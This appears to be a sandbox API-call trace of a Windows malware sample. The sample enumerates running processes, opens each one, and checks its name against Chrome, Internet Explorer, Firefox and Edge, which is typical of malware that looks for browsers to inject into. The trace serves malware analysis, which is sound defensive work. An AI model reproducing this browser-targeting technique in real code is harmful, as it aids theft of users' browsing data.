	[0227.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.303] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.303] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.304] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.304] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.304] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0227.305] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6034
	[0227.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.305] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.305] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.306] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.306] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0227.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6038
	[0227.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.307] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0227.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.307] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.308] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0227.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.308] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.309] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0227.309] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x603c
	[0227.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.310] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0227.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.310] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.310] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0227.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.310] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.311] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0227.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6040
	[0227.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.312] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0227.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.312] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.312] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0227.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.313] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.313] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0227.314] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6044
	[0227.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.314] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0227.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.314] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.315] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0227.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.315] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.315] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0227.316] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6048
	[0227.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.316] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0227.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.317] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.317] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0227.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.317] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.317] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0227.318] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x604c
	[0227.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.318] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0227.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.319] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.319] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0227.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.319] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.319] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6050
	[0227.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.320] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.321] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.321] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.321] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.321] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6054
	[0227.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.322] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.323] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.323] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.323] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.324] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6058
	[0227.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.325] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.325] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.325] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.326] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.326] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.327] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x605c
	[0227.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.327] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.327] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.328] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.328] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.328] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.329] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6060
	[0227.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.329] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.330] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.330] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.330] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.330] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6064
	[0227.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.331] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.332] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.332] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.333] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.333] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.333] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6068
	[0227.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.334] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.334] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.334] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.335] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.335] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0227.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x606c
	[0227.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.336] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0227.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.336] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.336] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0227.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.337] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.337] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.338] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6070
	[0227.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.338] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.338] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.339] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.339] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.347] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0227.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6074
	[0227.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.348] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.349] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.349] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.350] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.350] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0227.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6078
	[0227.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0227.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0227.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.352] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.352] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x607c
	[0227.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.353] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.353] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.354] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.354] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.354] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0227.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6080
	[0227.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.355] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0227.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.355] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0227.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.356] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.356] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0227.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6084
	[0227.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.357] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0227.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.358] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.358] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0227.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.358] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.359] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0227.359] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6088
	[0227.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.359] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0227.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.360] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.360] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0227.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.360] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.360] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0227.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x608c
	[0227.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.361] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0227.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.362] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.362] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0227.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.362] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.363] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0227.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0227.363] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0227.364] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6090
	[0227.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.364] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0227.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.365] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.366] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0227.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
